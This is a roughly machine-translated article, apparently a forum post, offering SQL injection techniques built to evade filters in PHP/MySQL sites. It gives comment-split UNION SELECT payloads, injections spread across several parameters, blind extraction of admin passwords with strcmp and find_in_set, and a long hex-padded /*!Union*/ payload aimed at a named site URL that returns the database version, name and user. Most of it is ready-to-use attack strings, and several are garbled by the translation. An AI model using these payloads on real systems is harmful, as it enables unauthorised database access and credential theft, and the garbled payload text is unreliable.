SQL bypass injection of the latest code

Since the development of SQL injection, many security articles seem to distort the injection thinking of many people. The traditional method of detecting injection is to judge whether the injection is completely filtered by: and11, and12, there are also or12, or11, or in numerical injection such as: id1 + 1 or id2-1, etc. The purpose of this article is not to judge who's detection method is actually

Since the development of SQL injection, many security articles seem to distort the injection thinking of many people. The traditional method of detecting injection is as follows:

And 1 = 1, and 1 = 2 to determine whether the filter is completely true or false. Of course, there are also or 1 = 2, or 1 = 1, or

In the numerical injection example:Id= 1 + 1 or id = 2-1, etc.

The purpose of this article is not to judge who's testing method is practical, but to recommend some new injection methods, which may have been mentioned earlier :)

Note: mainlyPhpFor reference, I will not introduce them one by one.

First, let's judge:

The Null value can be used as follows: and 1 is null, and 1 is not null.

Or: and 2 <= 3

In fact, many people often use = to judge, but, for example, >=, <=, is null, is not null, and <> can be used to determine

Next we will talk about injection.

We are familiar with the union select and blind sqlinjection values)

Union Select

For conventional injection, We Can union select 1, 2, 3, 4, or union/**/select/*/1, 2, 3, 4

OK. Let's see my demo, id = 1 + u/**/nio/**/n + se/**/lect + 1 & id = 2, 3 & id = 4 is disgusting?

Attackers can bypass all injection prevention measures in China. This code has the above effect after running. As for the principle, I hope you can do it yourself.

Check the relevant information and leave a message if you have any objection.

Of course, when the statement passes multiple parameters, such as slect * from table where id = 1 and name = xxx, we can do this:

Id = 1 + union/* & name = */select + 1, 2

Slect * from table where id = 1 union/* and name = xxx */select 1, 2

This is a technique to invalidate constants (variables). Of course, the environment is demanding.

Next we will talk about Blind SqlIjection (Blind note)

In general, I think we should do this: ascii (SuBsTrIng (password, 1, 1) = 56, or

Ord (mid (password, 1, 1) = 56

Here, we recommend that you use subqueries. Of course, the premise is to guess the table and fields to get the desired data more accurately.

Previously, we recommended some new methods:

Find_ In _SetExample: find_in_set ('56', ascii (substr (password,) = 1

StrCmpExample: strcmp (left ('Password', 1), 0 × 56) = 1

Set these functions as subqueries:

Id = 1 + and + strcmp (substring (sleect + password + from + admin + limit +),), 0 × 55) = 1 faLsE

Id = 1 + and + strcmp (substring (sleect + password + from + admin + limit +),), 0 × 56) = 0 true

Id = 1 + and + strcmp (substring (sleect + password + from + admin + limit +),), 0 × 57) =-1 false

For foreigners, the NB method is also -.-

The tragedy still persists, nnd. In China

The above methods can be done in general, foreigners are bt. Php injection abroad has a long history. The unique method + method has a high probability of being cool-handled.

Http://www.tmdsb.com/indEx. Php? Content =More_ ProDuCt & id =-17 and (select 1) = (select
0 xaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
AAAAAAAAAAAAAAAA) + /*! Union */+ select + 1, 2, 4, 5, 6-+-

By the way, the foreigner is sure to continue shooting.

Http://www.tmdsb.com/index.php? Content = more_product & id =-17 and (select 1) = (select
0 xaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
AAAAAAAAAAAAAAAA) + /*! Union */+ select + 1, coNcAt_ws (0x7c, version (), database (), u
Ser (), 3, 4, 5, 6-+-
The system version, current database user, and username. BY: t00ls are obtained successfully.